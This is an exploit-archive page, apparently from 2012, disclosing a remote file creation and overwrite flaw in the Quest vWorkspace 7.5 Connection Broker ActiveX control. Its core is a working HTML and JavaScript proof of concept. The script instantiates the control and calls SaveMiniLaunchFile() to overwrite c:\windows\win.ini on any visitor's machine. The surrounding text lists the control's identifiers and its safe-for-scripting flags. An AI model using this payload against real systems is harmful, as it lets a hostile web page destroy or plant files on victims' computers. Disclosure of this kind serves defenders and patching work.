Quest vWorkspace 7.5 Remote File Creation / Overwrite

2012.04.06

Credit: rgod

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<!--
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547)
SaveMiniLaunchFile() Method Remote File Creation / Overwrite
ie7/8
vendor site: http://www.quest.com/
file tested: Quest_vWorkspace-75--32-bit_75.zip
Binary Path: C:\WINDOWS\system32\pnllmcli.dll
CLSID: {D9397163-A2DB-4A4A-B2C9-34E876AF2DFC}
Progid: PNLLM.Client.1
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
var obj = new ActiveXObject("PNLLM.Client.1");
obj.SaveMiniLaunchFile("","c:\\windows\\win.ini");
</script>
original url: http://retrogod.altervista.org/9sg_quest_vworkspace_poc.htm

References:

http://retrogod.altervista.org/9sg_quest_vworkspace_poc.htm

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Quest vWorkspace 7.5 Remote File Creation / Overwrite

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.